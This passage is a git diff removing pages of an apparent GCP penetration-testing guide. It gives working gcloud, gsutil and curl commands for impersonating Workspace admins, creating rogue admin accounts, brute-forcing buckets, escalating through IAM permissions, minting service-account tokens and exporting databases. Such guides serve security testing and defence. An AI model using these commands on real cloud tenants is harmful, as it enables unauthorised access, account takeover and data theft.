-
-However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled** (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programmatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.
-
-To create this relation it needs to be enabled both in GCP and in Workspace.
-
-#### Test Workspace access
-
-To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
-
-This topic is a bit tricky... your service account has something called a "client\_email" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access Workspace API calls directly with that email, even with delegation enabled, you will fail. This is because the Workspace directory will not include the GCP service account's email addresses. Instead, to interact with Workspace, we need to impersonate valid Workspace users.
-
-What you really want to do is to **impersonate a user with administrative access**, and then use that access to do something like **reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account**.
-
-GitLab has created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_misc/blob/master/gcp\_delegation.py) that can do two things: list the user directory and create a new administrative account. Here is how you would use it:
-
-```bash
-# Validate access only
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com
-
-# List the directory
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com \
- --list
-
-# Create a new admin account
-./gcp_delegation.py --keyfile ./credentials.json \
- --impersonate steve.admin@target-org.com \
- --domain target-org.com \
- --account pwned
-```
-
-You can try this script across a range of email addresses to impersonate **various users**. Standard output will indicate whether or not the service account has access to Workspace, and will include a **random password for the new admin account** if one is created.
-
-If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.
-
-### Looting
-
-Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find enumeration recommendations for some GCP services, but others could also be in use, so feel free to submit PRs indicating ways to enumerate more services:
-
-{% hint style="info" %}
-Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource).
-{% endhint %}
-
-There is a gcloud API endpoint that aims to **list all the resources accessible to the user account in use**. It's in alpha and only supports a couple of resources, but maybe in the future you will be able to list everything you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/)
-
-{% content-ref url="gcp-buckets-enumeration.md" %}
-[gcp-buckets-enumeration.md](gcp-buckets-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-compute-enumeration.md" %}
-[gcp-compute-enumeration.md](gcp-compute-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-network-enumeration.md" %}
-[gcp-network-enumeration.md](gcp-network-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-kms-and-secrets-management-enumeration.md" %}
-[gcp-kms-and-secrets-management-enumeration.md](gcp-kms-and-secrets-management-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-databases-enumeration.md" %}
-[gcp-databases-enumeration.md](gcp-databases-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-serverless-code-exec-services-enumeration.md" %}
-[gcp-serverless-code-exec-services-enumeration.md](gcp-serverless-code-exec-services-enumeration.md)
-{% endcontent-ref %}
-
-{% content-ref url="gcp-looting.md" %}
-[gcp-looting.md](gcp-looting.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="gcp-persistance.md" %}
-[gcp-persistance.md](gcp-persistance.md)
-{% endcontent-ref %}
-
-## Capture gcloud, gsutil... network traffic
-
-```bash
-gcloud config set proxy/address 127.0.0.1
-gcloud config set proxy/port 8080
-gcloud config set proxy/type http
-gcloud config set auth/disable_ssl_validation True
-
-# If you don't want to completely disable ssl_validation use:
-gcloud config set core/custom_ca_certs_file cert.pem
-
-# Back to normal
-gcloud config unset proxy/address
-gcloud config unset proxy/port
-gcloud config unset proxy/type
-gcloud config unset auth/disable_ssl_validation
-gcloud config unset core/custom_ca_certs_file
-```
-
-## References
-
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
-
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
deleted file mode 100644
index a95a44ad6..000000000
--- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation
-
-## Public Assets Discovery
-
-One way to discover public cloud resources that belong to a company is to scrape their websites looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web and search for **links to public cloud resources** (in this case the tool searches for `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`)
-
-Note that other cloud resources could be searched for, and that sometimes these resources are hidden behind **subdomains pointing to them via a CNAME record**.
-
-## Public Resources Brute-Force
-
-### Buckets, Firebase, Apps & Cloud Functions
-
-* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): In GCP, this tool brute-forces Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions
-* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): In GCP, this tool brute-forces Buckets and Apps.
-
-### Buckets
-
-Like other clouds, GCP also offers Buckets to its users. These buckets might be publicly accessible (allowing anyone to list the content, read, write...).
-
-![](<../../.gitbook/assets/image (618) (3).png>)
-
-The following tool can be used to generate variations of a given name and search for misconfigured buckets with those names:
-
-* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute)
-
-## Privilege Escalation
-
-If the bucket policy allows either "allUsers" or "allAuthenticatedUsers" to **write to the bucket policy** (the **storage.buckets.setIamPolicy** permission), then anyone can modify the bucket policy and grant themselves full access.
-
-### Check Permissions
-
-There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`.
-
-However, if your user (potentially belonging to allUsers or allAuthenticatedUsers) doesn't have permissions to read the IAM policy of the bucket (storage.buckets.getIamPolicy), that won't work.
-
-The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update`
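-
-For example, checking a couple of permissions with an authenticated request (a sketch):
-
-```bash
-curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-    "https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.setIamPolicy&permissions=storage.objects.list"
-```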
-
-### Escalating
-
-With the `gsutil` Google Storage CLI program, we can run the following command to grant "allAuthenticatedUsers" access to the "Storage Admin" role, thus **escalating the privileges we were granted** over the bucket:
-
-```
-gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
-```
-
-One of the main attractions of escalating from LegacyBucketOwner to Storage Admin is the ability to use the storage.buckets.delete privilege. In theory, you could **delete the bucket after escalating your privileges, then re-create the bucket in your own account to steal the name**.
-
-## References
-
-* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)
-
diff --git a/cloud-security/gcp-security/gcp-buckets-enumeration.md b/cloud-security/gcp-security/gcp-buckets-enumeration.md
deleted file mode 100644
index da44e3659..000000000
--- a/cloud-security/gcp-security/gcp-buckets-enumeration.md
+++ /dev/null
@@ -1,106 +0,0 @@
-Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
-
-This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
-
-The following commands will help you explore this vector:
-
-```bash
-# List all storage buckets in project
-gsutil ls
-
-# Get detailed info on all buckets in project
-gsutil ls -L
-
-# List contents of a specific bucket (recursive, so careful!)
-gsutil ls -r gs://bucket-name/
-
-# Cat the content of a file without copying it locally
-gsutil cat gs://bucket-name/folder/object
-
-# Copy an object from the bucket to your local storage for review
-gsutil cp gs://bucket-name/folder/object ~/
-```
-
-If you get a permission denied error listing buckets, you may still have access to the content. So, now that you know the naming convention of the buckets, you can generate a list of possible names and try to access them:
-
-```bash
-for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
-```
-
-## Search Open Buckets
-
-With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets:
-
-```bash
-#!/bin/bash
-
-############################
-# Run this tool to find buckets that are open to the public anywhere
-# in your GCP organization.
-#
-# Enjoy!
-############################
-
-for proj in $(gcloud projects list --format="get(projectId)"); do
- echo "[*] scraping project $proj"
- for bucket in $(gsutil ls -p $proj); do
- echo " $bucket"
- ACL="$(gsutil iam get $bucket)"
-
- all_users="$(echo $ACL | grep allUsers)"
- all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
-
- if [ -z "$all_users" ]
- then
- :
- else
- echo "[!] Open to all users: $bucket"
- fi
-
- if [ -z "$all_auth" ]
- then
- :
- else
- echo "[!] Open to all authenticated users: $bucket"
- fi
-    done
-done
-```
-
diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md
deleted file mode 100644
index efe25c13d..000000000
--- a/cloud-security/gcp-security/gcp-compute-enumeration.md
+++ /dev/null
@@ -1,171 +0,0 @@
-# Compute instances
-
-It is interesting to **get the zones** the project is using, the **list of all running instances**, and details about each of them.
-
-The details may include:
-
-* **Network info**: Internal and external IP addresses, network and subnetwork names and security group
-* Custom **key/values in the metadata** of the instance
-* **Protection** information like `shieldedInstanceConfig` and `shieldedInstanceIntegrityPolicy`
-* **Screenshot** and the **OS** running
-* Try to **ssh** into it and try to **modify** the **metadata**
-
-```bash
-# Get list of regions in use
-# It's interesting to know which regions (and their zones) are being used
-gcloud compute regions list | grep -E "NAME|[^0]/"
-
-# List compute instances & get info
-gcloud compute instances list
-gcloud compute instances describe [INSTANCE] --project [PROJECT]
-gcloud compute instances get-screenshot [INSTANCE] --project [PROJECT]
-gcloud compute instances os-inventory list-instances #Get OS info of instances (OS Config agent is running on instances)
-
-# Try to SSH & modify metadata
-gcloud compute ssh [INSTANCE]
-gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
-```
-
-For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges** check this page:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-## Custom Metadata
-
-Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it can also be retrieved from inside the instance by accessing the metadata endpoint.
-
-```bash
-# view project metadata
-curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-
-# view instance metadata
-curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
- -H "Metadata-Flavor: Google"
-```
-
-## Serial Console Logs
-
-Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which low-privileged users may not usually see, but with the appropriate IAM permissions you may be able to read them.
-
-You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs:
-
-```
-gcloud compute instances get-serial-port-output instance-name \
- --port port \
- --start start \
- --zone zone
-```
-
-## Local Privilege Escalation and Pivoting
-
-If you compromise a compute instance, you should also check the actions mentioned in the following page:
-
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-# Images
-
-## Custom Images
-
-**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. You can query the list of non-standard images in a project with the following command:
-
-```
-gcloud compute images list --no-standard-images
-```
-
-You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
-
-```bash
-gcloud compute images export --image test-image \
- --export-format qcow2 --destination-uri [BUCKET]
-
-# Run a container image stored in the project's Container Registry (project ID is a placeholder)
-docker run --rm -ti gcr.io/[PROJECT-ID]/secret:v1 sh
-```
-
-More generic enumeration:
-
-```bash
-gcloud compute images list
-gcloud compute images list --project windows-cloud --no-standard-images #non-Shielded VM Windows Server images
-gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images
-```
-
-## Custom Instance Templates
-
-An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
-
-```bash
-# List the available templates
-gcloud compute instance-templates list
-
-# Get the details of a specific template
-gcloud compute instance-templates describe [TEMPLATE NAME]
-```
-
-# More Enumeration
-
-| Description | Command |
-| ---------------------- | --------------------------------------------------------------------------------------------------------- |
-| **Stop** an instance | `gcloud compute instances stop instance-2` |
-| **Start** an instance | `gcloud compute instances start instance-2` |
-| **Create** an instance | `gcloud compute instances create vm1 --image image-1 --tags test --zone [ZONE] --machine-type f1-micro` |
-| **Download** files | `gcloud compute copy-files example-instance:~/REMOTE-DIR ~/LOCAL-DIR --zone us-central1-a` |
-| **Upload** files | `gcloud compute copy-files ~/LOCAL-FILE-1 example-instance:~/REMOTE-DIR --zone us-central1-a` |
-| List all **disks** | `gcloud compute disks list` |
-| List all disk types | `gcloud compute disk-types list` |
-| List all **snapshots** | `gcloud compute snapshots list` |
-| **Create** snapshot | `gcloud compute disks snapshot [DISK] --snapshot-names [NAME] --zone [ZONE]` |
-
diff --git a/cloud-security/gcp-security/gcp-databases-enumeration.md b/cloud-security/gcp-security/gcp-databases-enumeration.md
deleted file mode 100644
index 6a417ad8c..000000000
--- a/cloud-security/gcp-security/gcp-databases-enumeration.md
+++ /dev/null
@@ -1,129 +0,0 @@
-Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
-
-Databases will usually contain interesting information, so checking them is highly recommended. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
-
-As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
-
-## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
-
-Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance. [Learn more](https://cloud.google.com/sql/docs/)
-
-If you find any of these instances in use, you could try to **access them from the internet**, as they might be misconfigured and accessible.
-
-```bash
-# Cloud SQL
-gcloud sql instances list
-gcloud sql databases list --instance [INSTANCE]
-gcloud sql backups list --instance [INSTANCE]
-gcloud sql export sql [INSTANCE] gs://[BUCKET_NAME]/cloudsql/export.sql.gz --database=[DATABASE]
-```
-
-## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
-
-Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
-
-```bash
-# Cloud Spanner
-gcloud spanner instances list
-gcloud spanner databases list --instance [INSTANCE]
-gcloud spanner backups list --instance [INSTANCE]
-```
-
-## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
-
-A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
-
-```bash
-# Cloud Bigtable
-gcloud bigtable instances list
-gcloud bigtable clusters list
-gcloud bigtable backups list --instance [INSTANCE]
-```
-
-## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
-
-Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
-
-```bash
-gcloud firestore indexes composite list
-gcloud firestore indexes fields list
-gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios'
-```
-
-## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
-
-The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/).
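-
-If the database **rules allow public access**, you can read it unauthenticated. A minimal check (the database URL is a hypothetical placeholder; newer projects use the `[PROJECT_ID]-default-rtdb` naming):
-
-```bash
-# Dump the whole DB as JSON if rules are misconfigured
-curl "https://[PROJECT_ID].firebaseio.com/.json"
-```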
-
-## Memorystore
-
-Reduce latency with scalable, secure, and highly available in-memory services for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache).
-
-```bash
-gcloud memcache instances list --region [region]
-# You should try to connect to the memcache instances to access the data
-
-gcloud redis instances list --region [region]
-gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
-```
-
-## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool)
-
-BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuery's serverless architecture lets you use SQL queries to answer your organization's biggest questions with zero infrastructure management. BigQuery's scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction).
-
-```bash
-bq ls -p #List projects
-bq ls -a #List all datasets
-bq ls #List datasets from current project
-bq ls [PROJECT]:[DATASET] #List tables inside the dataset
-
-# Show information
-bq show "[PROJECT]:[DATASET]"
-bq show "[PROJECT]:[DATASET].[TABLE]"
-bq show --encryption_service_account
-
-bq query '[SQL_QUERY]' #Run a query against the dataset
-
-# Dump the table or dataset
-bq extract ds.table gs://mybucket/table.csv
-bq extract -m ds.model gs://mybucket/model
-```
-
-BigQuery SQL injection: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/README.md b/cloud-security/gcp-security/gcp-interesting-permissions/README.md
deleted file mode 100644
index abc9b2d0b..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/README.md
+++ /dev/null
@@ -1,77 +0,0 @@
-
-# Introduction to GCP Privilege Escalation
-
-GCP, like any other cloud, has **principals**: users, groups and service accounts, and **resources** like compute engine, cloud functions…\
-Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
-There are certain permissions that will allow a user to **get even more permissions** on the resource or on third-party resources, and that's what is called **privilege escalation** (also, the exploitation of vulnerabilities to get more permissions).
-
-Therefore, I would like to separate GCP privilege escalation techniques into **2 groups**:
-
-* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all its permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
-* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse the _setIamPolicy_ permission over cloudfunctions to allow yourself to trigger the function.
-  * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this allows escalating to a principal via a resource escalation. This has happened in several resources previously, but now it's less frequent (it can still happen though).
-
-Obviously, the most interesting privilege escalation techniques are the ones of the **first group**, because they will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may also give you access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a SA token).
-
-{% hint style="warning" %}
-It's also important to note that in **GCP Service Accounts are both principals and resources**, so escalating privileges over a SA as a resource will also allow you to impersonate it.
-{% endhint %}
-
-{% hint style="info" %}
-The permissions in parentheses indicate the permissions needed to exploit the vulnerability with `gcloud`. They might not be needed if exploiting it through the API.
-{% endhint %}
-
-# Privilege Escalation to Principals
-
-Check all the **known permissions** that will allow you to **escalate privileges over other principals** in:
-
-{% content-ref url="gcp-privesc-to-other-principals.md" %}
-[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md)
-{% endcontent-ref %}
-
-# Privilege Escalation to Resources
-
-Check all the **known permissions** that will allow you to **escalate privileges over other resources** in:
-
-{% content-ref url="gcp-privesc-to-resources.md" %}
-[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md)
-{% endcontent-ref %}
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
deleted file mode 100644
index fc445c892..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md
+++ /dev/null
@@ -1,340 +0,0 @@
-
-{% hint style="info" %}
-GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\
-If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it.
-{% endhint %}
-
-# IAM
-
-## iam.roles.update (iam.roles.get)
-
-If you have the mentioned permissions you will be able to update a role assigned to you and give yourself extra permissions over other resources like:
-
-```bash
-gcloud iam roles update [ROLE_ID] --project [PROJECT_ID] --add-permissions [PERMISSIONS]
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)
-
-This permission allows you to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than our own.
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
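-
-As a quick sketch of the abuse (the SA email is a placeholder):
-
-```bash
-# Mint an access token for the target SA
-gcloud auth print-access-token --impersonate-service-account="[TARGET_SA_EMAIL]"
-
-# Or call the IAM Credentials API directly
-curl -s -X POST \
-    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-    -H "Content-Type: application/json" \
-    -d '{"scope": ["https://www.googleapis.com/auth/cloud-platform"], "lifetime": "3600s"}' \
-    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/[TARGET_SA_EMAIL]:generateAccessToken"
-```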
-
-## iam.serviceAccountKeys.create
-
-This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
-
-```bash
-gcloud iam service-accounts keys create [OUTPUT_FILE].json --iam-account [SA_EMAIL]
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permission iam.serviceAccountKeys.create is also needed.
-
-## iam.serviceAccounts.implicitDelegation
-
-If you have the _**iam.serviceAccounts.implicitDelegation**_ **permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_ **permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png)
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method.
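-
-As a sketch, the delegation chain is expressed via the `delegates` field of that call ([MIDDLE_SA] and [TARGET_SA] are placeholders):
-
-```bash
-# We have implicitDelegation over [MIDDLE_SA], which has getAccessToken over [TARGET_SA]
-curl -s -X POST \
-    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-    -H "Content-Type: application/json" \
-    -d '{"delegates": ["projects/-/serviceAccounts/[MIDDLE_SA]"], "scope": ["https://www.googleapis.com/auth/cloud-platform"], "lifetime": "3600s"}' \
-    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/[TARGET_SA]:generateAccessToken"
-```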
-
-## iam.serviceAccounts.signBlob
-
-The _iam.serviceAccounts.signBlob_ permission "allows signing of arbitrary payloads" in GCP. This means we can **create an unsigned JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
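-
-The underlying API call looks like this (sketch; the payload, e.g. an unsigned JWT, must be base64-encoded):
-
-```bash
-# Get an arbitrary payload signed by the target SA
-curl -s -X POST \
-    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-    -H "Content-Type: application/json" \
-    -d "{\"payload\": \"$(echo -n '[DATA_TO_SIGN]' | base64)\"}" \
-    "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/[TARGET_SA_EMAIL]:signBlob"
-```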
-
-## iam.serviceAccounts.signJwt
-
-Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference from the previous method is that **instead of making Google sign a blob containing a JWT, we use the signJwt method that already expects a JWT**. This makes it easier to use, but you can only sign JWTs instead of arbitrary bytes.
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
-
-## iam.serviceAccounts.setIamPolicy
-
-This permission allows you to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we grant ourselves the "roles/iam.serviceAccountTokenCreator" role over the interesting SA:
-
-```bash
-gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
- --member="user:username@domain.com" \
- --role="roles/iam.serviceAccountTokenCreator"
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
-
-## iam.serviceAccounts.actAs
-
